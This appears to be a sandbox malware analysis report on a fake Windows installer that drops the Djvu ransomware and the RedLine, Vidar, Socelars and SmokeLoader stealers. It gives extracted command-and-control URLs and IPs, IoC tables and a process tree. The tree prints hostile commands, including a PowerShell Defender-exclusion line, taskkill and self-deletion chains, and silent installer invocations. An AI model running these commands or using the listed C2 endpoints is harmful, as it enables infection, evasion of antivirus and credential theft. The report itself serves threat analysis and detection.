djvu | 8fe6c86b038ce91a991fe6eb8a9b323bb37b554ff6b4e5c18de3fe52d4aedf6d

Target

setup_x86_x64_install.exe
Size

4.3MB
MD5

6d18c8e8ab9051f7a70b89ff7bb0ec35
SHA1

265311e2afd9f59e824f4b77162cf3dfa278eb7e
SHA256

8fe6c86b038ce91a991fe6eb8a9b323bb37b554ff6b4e5c18de3fe52d4aedf6d
SHA512

249bf79dc90d4662b942c7eed2a7b7816b749f6d5f7bc190bba05f826fa143d0b44f58054d8649b8626884c5fcbd1cea8abd625dc701d44b7aaac84fc74e47ff

Score

10^/10

djvu redline smokeloader socelars vidar 706 pab123 uts aspackv2 backdoor discovery infostealer ransomware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://shellloader.com/welcome

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

vidar

Version

40.5

Botnet

706

https://gheorghip.tumblr.com/

Attributes

profile_id
706

Extracted

Family

redline

Botnet

pab123

45.14.49.169:22411

Extracted

Family

redline

Botnet

UTS

45.9.20.20:13441

Signatures

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4896	1572	rundll32.exe	125
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2748	1572	rundll32.exe	125
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6644	1572	rUNdlL32.eXe	125

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

resource	yara_rule
behavioral8/memory/1676-269-0x00000000047C0000-0x00000000047DF000-memory.dmp	family_redline
behavioral8/memory/1676-286-0x0000000004A20000-0x0000000004A3E000-memory.dmp	family_redline
behavioral8/memory/4552-395-0x0000000004880000-0x000000000489F000-memory.dmp	family_redline
behavioral8/memory/4552-400-0x0000000004B90000-0x0000000004BAE000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral8/files/0x000500000001ab1a-141.dat	family_socelars
behavioral8/files/0x000500000001ab1a-177.dat	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral8/memory/3504-266-0x0000000004850000-0x0000000004921000-memory.dmp	family_vidar
behavioral8/memory/3504-287-0x0000000000400000-0x0000000002BC5000-memory.dmp	family_vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral8/files/0x000400000001ab0c-124.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab0c-125.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab0d-123.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab0d-127.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab0f-128.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab0f-131.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 16 IoCs

pid	Process
4676	setup_installer.exe
4640	setup_install.exe
1304	Thu219d5fe8cf316.exe
1532	Thu21b93295136197.exe
1572	wmiprvse.exe
1676	Thu21624565bb917a.exe
2272	Thu21a1ef054cac78a.exe
2592	Thu214aaca5625.exe
3716	Thu2156de5489c19.exe
2232	Thu21b93295136197.tmp
3504	Thu214ce31cede21.exe
304	Thu21b9847cb6727.exe
2612	Thu21df5caa1b78de6.exe
1332	Thu214aaca5625.tmp
5064	Thu2102ff6cfe07c.exe
4028	Conhost.exe

Loads dropped DLL 9 IoCs

pid	Process
4640	setup_install.exe
4640	setup_install.exe
4640	setup_install.exe
4640	setup_install.exe
4640	setup_install.exe
4640	setup_install.exe
2232	Thu21b93295136197.tmp
2232	Thu21b93295136197.tmp
1332	Thu214aaca5625.tmp

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5924	icacls.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 13 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
153	ipinfo.io
233	freegeoip.app
238	freegeoip.app
272	api.2ip.ua
19	ip-api.com
21	ipinfo.io
112	ip-api.com
236	freegeoip.app
271	api.2ip.ua
291	api.2ip.ua
24	ipinfo.io
150	ipinfo.io
235	freegeoip.app

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 26 IoCs

pid	pid_target	Process	procid_target
4852	2612	WerFault.exe	94
5412	2612	WerFault.exe	94
5796	2612	WerFault.exe	94
6028	2136	WerFault.exe	122
1916	2612	WerFault.exe	94
2488	2692	WerFault.exe	123
5484	2136	WerFault.exe	122
5360	2136	WerFault.exe	122
2052	2612	WerFault.exe	94
5964	2136	WerFault.exe	122
2192	5620	WerFault.exe	142
2196	2612	WerFault.exe	94
4136	2136	WerFault.exe	122
6072	5620	WerFault.exe	142
5664	5620	WerFault.exe	142
5244	2136	WerFault.exe	122
4420	2612	WerFault.exe	94
3136	5620	WerFault.exe	142
1376	2136	WerFault.exe	122
1320	5620	WerFault.exe	142
2844	5620	WerFault.exe	142
5504	5620	WerFault.exe	142
4060	5620	WerFault.exe	142
5404	5620	WerFault.exe	142
6628	5620	WerFault.exe	142
5300	5940	WerFault.exe	161

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
5200	schtasks.exe
6504	schtasks.exe
2176	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
6376	timeout.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
5896	taskkill.exe
6700	taskkill.exe
6628	taskkill.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
6332	PING.EXE
3056	PING.EXE

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	22	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	56	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	151	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
372	powershell.exe
372	powershell.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeAssignPrimaryTokenPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeLockMemoryPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeIncreaseQuotaPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeMachineAccountPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeTcbPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeSecurityPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeTakeOwnershipPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeLoadDriverPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeSystemProfilePrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeSystemtimePrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeProfSingleProcessPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeIncBasePriorityPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeCreatePagefilePrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeCreatePermanentPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeBackupPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeRestorePrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeShutdownPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeDebugPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeAuditPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeSystemEnvironmentPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeChangeNotifyPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeRemoteShutdownPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeUndockPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeSyncAgentPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeEnableDelegationPrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeManageVolumePrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeImpersonatePrivilege	2272	Thu21a1ef054cac78a.exe
Token: SeCreateGlobalPrivilege	2272	Thu21a1ef054cac78a.exe
Token: 31	2272	Thu21a1ef054cac78a.exe
Token: 32	2272	Thu21a1ef054cac78a.exe
Token: 33	2272	Thu21a1ef054cac78a.exe
Token: 34	2272	Thu21a1ef054cac78a.exe
Token: 35	2272	Thu21a1ef054cac78a.exe
Token: SeDebugPrivilege	4028	Conhost.exe
Token: SeDebugPrivilege	372	powershell.exe
Token: SeDebugPrivilege	1304	Thu219d5fe8cf316.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2232	Thu21b93295136197.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5108 wrote to memory of 4676	5108	setup_x86_x64_install.exe	80
PID 5108 wrote to memory of 4676	5108	setup_x86_x64_install.exe	80
PID 5108 wrote to memory of 4676	5108	setup_x86_x64_install.exe	80
PID 4676 wrote to memory of 4640	4676	setup_installer.exe	81
PID 4676 wrote to memory of 4640	4676	setup_installer.exe	81
PID 4676 wrote to memory of 4640	4676	setup_installer.exe	81
PID 4640 wrote to memory of 4940	4640	setup_install.exe	85
PID 4640 wrote to memory of 4940	4640	setup_install.exe	85
PID 4640 wrote to memory of 4940	4640	setup_install.exe	85
PID 4640 wrote to memory of 4888	4640	setup_install.exe	86
PID 4640 wrote to memory of 4888	4640	setup_install.exe	86
PID 4640 wrote to memory of 4888	4640	setup_install.exe	86
PID 4640 wrote to memory of 424	4640	setup_install.exe	87
PID 4640 wrote to memory of 424	4640	setup_install.exe	87
PID 4640 wrote to memory of 424	4640	setup_install.exe	87
PID 4640 wrote to memory of 588	4640	setup_install.exe	88
PID 4640 wrote to memory of 588	4640	setup_install.exe	88
PID 4640 wrote to memory of 588	4640	setup_install.exe	88
PID 4640 wrote to memory of 896	4640	setup_install.exe	112
PID 4640 wrote to memory of 896	4640	setup_install.exe	112
PID 4640 wrote to memory of 896	4640	setup_install.exe	112
PID 4640 wrote to memory of 888	4640	setup_install.exe	89
PID 4640 wrote to memory of 888	4640	setup_install.exe	89
PID 4640 wrote to memory of 888	4640	setup_install.exe	89
PID 4640 wrote to memory of 416	4640	setup_install.exe	111
PID 4640 wrote to memory of 416	4640	setup_install.exe	111
PID 4640 wrote to memory of 416	4640	setup_install.exe	111
PID 4940 wrote to memory of 372	4940	cmd.exe	90
PID 4940 wrote to memory of 372	4940	cmd.exe	90
PID 4940 wrote to memory of 372	4940	cmd.exe	90
PID 4640 wrote to memory of 1056	4640	setup_install.exe	91
PID 4640 wrote to memory of 1056	4640	setup_install.exe	91
PID 4640 wrote to memory of 1056	4640	setup_install.exe	91
PID 4640 wrote to memory of 1228	4640	setup_install.exe	110
PID 4640 wrote to memory of 1228	4640	setup_install.exe	110
PID 4640 wrote to memory of 1228	4640	setup_install.exe	110
PID 4888 wrote to memory of 1304	4888	cmd.exe	109
PID 4888 wrote to memory of 1304	4888	cmd.exe	109
PID 4640 wrote to memory of 1404	4640	setup_install.exe	108
PID 4640 wrote to memory of 1404	4640	setup_install.exe	108
PID 4640 wrote to memory of 1404	4640	setup_install.exe	108
PID 888 wrote to memory of 1532	888	cmd.exe	92
PID 888 wrote to memory of 1532	888	cmd.exe	92
PID 888 wrote to memory of 1532	888	cmd.exe	92
PID 896 wrote to memory of 1572	896	cmd.exe	125
PID 896 wrote to memory of 1572	896	cmd.exe	125
PID 896 wrote to memory of 1572	896	cmd.exe	125
PID 424 wrote to memory of 1676	424	cmd.exe	106
PID 424 wrote to memory of 1676	424	cmd.exe	106
PID 424 wrote to memory of 1676	424	cmd.exe	106
PID 4640 wrote to memory of 1748	4640	setup_install.exe	105
PID 4640 wrote to memory of 1748	4640	setup_install.exe	105
PID 4640 wrote to memory of 1748	4640	setup_install.exe	105
PID 4640 wrote to memory of 1524	4640	setup_install.exe	104
PID 4640 wrote to memory of 1524	4640	setup_install.exe	104
PID 4640 wrote to memory of 1524	4640	setup_install.exe	104
PID 588 wrote to memory of 2272	588	cmd.exe	103
PID 588 wrote to memory of 2272	588	cmd.exe	103
PID 588 wrote to memory of 2272	588	cmd.exe	103
PID 4640 wrote to memory of 2488	4640	setup_install.exe	150
PID 4640 wrote to memory of 2488	4640	setup_install.exe	150
PID 4640 wrote to memory of 2488	4640	setup_install.exe	150
PID 1748 wrote to memory of 2592	1748	cmd.exe	101
PID 1748 wrote to memory of 2592	1748	cmd.exe	101

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5108
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4676
- - C:\Users\Admin\AppData\Local\Temp\7zS442A84C4\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS442A84C4\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4640
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4940
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:372
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu219d5fe8cf316.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4888
    - - C:\Users\Admin\AppData\Local\Temp\7zS442A84C4\Thu219d5fe8cf316.exe
        
        Thu219d5fe8cf316.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1304
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu21624565bb917a.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:424
    - - C:\Users\Admin\AppData\Local\Temp\7zS442A84C4\Thu21624565bb917a.exe
        
        Thu21624565bb917a.exe
        5⤵
        Executes dropped EXE
        
        PID:1676
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu21a1ef054cac78a.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:588
    - - C:\Users\Admin\AppData\Local\Temp\7zS442A84C4\Thu21a1ef054cac78a.exe
        
        Thu21a1ef054cac78a.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2272
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:3056
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:5896
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu21b93295136197.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:888
    - - C:\Users\Admin\AppData\Local\Temp\7zS442A84C4\Thu21b93295136197.exe
        
        Thu21b93295136197.exe
        5⤵
        Executes dropped EXE
        
        PID:1532
      - C:\Users\Admin\AppData\Local\Temp\is-HT5MO.tmp\Thu21b93295136197.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HT5MO.tmp\Thu21b93295136197.tmp" /SL5="$301EC,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS442A84C4\Thu21b93295136197.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        
        PID:2232
        
        C:\Users\Admin\AppData\Local\Temp\is-N878K.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-N878K.tmp\Setup.exe" /Verysilent
        7⤵
        
        PID:5896
        
        C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
        8⤵
        
        PID:5388
        
        C:\Users\Admin\AppData\Local\Temp\is-JPIU1.tmp\stats.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-JPIU1.tmp\stats.tmp" /SL5="$20358,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
        9⤵
        
        PID:5644
        
        C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"
        8⤵
        
        PID:3572
        
        C:\Users\Admin\AppData\Local\Temp\BSKR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BSKR.exe"
        9⤵
        
        PID:6624
        
        C:\Users\Admin\AppData\Local\Temp\BSKR.exe
        
        C:\Users\Admin\AppData\Local\Temp\BSKR.exe
        10⤵
        
        PID:5368
        
        C:\Users\Admin\AppData\Local\Temp\BSKR.exe
        
        C:\Users\Admin\AppData\Local\Temp\BSKR.exe
        10⤵
        
        PID:6280
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe"
        9⤵
        
        PID:6892
        
        C:\Users\Admin\AppData\Local\Temp\Mortician.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Mortician.exe"
        9⤵
        
        PID:4300
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c cmd < Cerchia.vsdx
        10⤵
        
        PID:7096
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        11⤵
        
        PID:1752
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^JdxmflaMoKJKGKEonRKIDlCuNBztuuxobvTVXbusdtKZTUcnQFZrvdHmOhLNQgGwfAjlQJkqLaammCjTuVhBisMuOxuJLaA$" Attesa.vsdx
        12⤵
        
        PID:6548
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        Impedire.exe.com I
        12⤵
        
        PID:6596
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        13⤵
        
        PID:6564
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        14⤵
        
        PID:6672
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        15⤵
        
        PID:6932
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        16⤵
        
        PID:1012
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        17⤵
        
        PID:6948
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        18⤵
        
        PID:2876
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        19⤵
        
        PID:6272
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        20⤵
        
        PID:932
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        21⤵
        
        PID:7132
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        22⤵
        
        PID:7056
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        23⤵
        
        PID:5088
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        24⤵
        
        PID:6624
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        25⤵
        
        PID:3984
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        26⤵
        
        PID:6268
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        27⤵
        
        PID:6548
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        28⤵
        
        PID:5320
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        29⤵
        
        PID:5124
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        30⤵
        
        PID:6564
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        31⤵
        
        PID:5828
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        32⤵
        
        PID:5136
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        33⤵
        
        PID:584
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        34⤵
        
        PID:3840
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        35⤵
        
        PID:1980
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        36⤵
        
        PID:6828
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        37⤵
        
        PID:4060
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        38⤵
        
        PID:2456
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        39⤵
        
        PID:6680
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        40⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        41⤵
        
        PID:1752
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        42⤵
        
        PID:5112
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        43⤵
        
        PID:6852
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        44⤵
        
        PID:7080
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        45⤵
        
        PID:5996
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        46⤵
        
        PID:5360
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        47⤵
        
        PID:6640
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        48⤵
        
        PID:400
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        49⤵
        
        PID:5236
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        50⤵
        
        PID:6780
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost
        12⤵
        Runs ping.exe
        
        PID:3056
        
        C:\Users\Admin\AppData\Local\Temp\foradvertising.exe
        
        "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws1
        9⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "foradvertising.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" & exit
        10⤵
        
        PID:6444
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "foradvertising.exe" /f
        11⤵
        Kills process with taskkill
        
        PID:6628
        
        C:\Users\Admin\AppData\Local\Temp\gdgame.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gdgame.exe"
        9⤵
        
        PID:7040
        
        C:\Users\Admin\AppData\Local\Temp\gdgame.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a
        10⤵
        
        PID:4136
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"
        9⤵
        
        PID:7076
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630505794 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
        10⤵
        
        PID:3296
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu214ce31cede21.exe
      4⤵
      PID:1056
    - - C:\Users\Admin\AppData\Local\Temp\7zS442A84C4\Thu214ce31cede21.exe
        
        Thu214ce31cede21.exe
        5⤵
        Executes dropped EXE
        
        PID:3504
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Thu214ce31cede21.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS442A84C4\Thu214ce31cede21.exe" & del C:\ProgramData\*.dll & exit
        6⤵
        
        PID:6356
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Thu214ce31cede21.exe /f
        7⤵
        Kills process with taskkill
        
        PID:6700
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:6376
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu2102ff6cfe07c.exe
      4⤵
      PID:2488
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu21568b0ab8.exe
      4⤵
      PID:1524
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu214aaca5625.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1748
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu21df5caa1b78de6.exe /mixone
      4⤵
      PID:1404
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu2156de5489c19.exe
      4⤵
      PID:1228
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu21b9847cb6727.exe
      4⤵
      PID:416
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu2164f292a11ce.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:896

C:\Users\Admin\AppData\Local\Temp\7zS442A84C4\Thu21df5caa1b78de6.exe
Thu21df5caa1b78de6.exe /mixone
1⤵
- Executes dropped EXE
PID:2612
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 656
  2⤵
  - Program crash
  PID:4852
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 672
  2⤵
  - Program crash
  PID:5412
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 680
  2⤵
  - Program crash
  PID:5796
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 756
  2⤵
  - Program crash
  PID:1916
- C:\Windows\SysWOW64\WerFault.exe
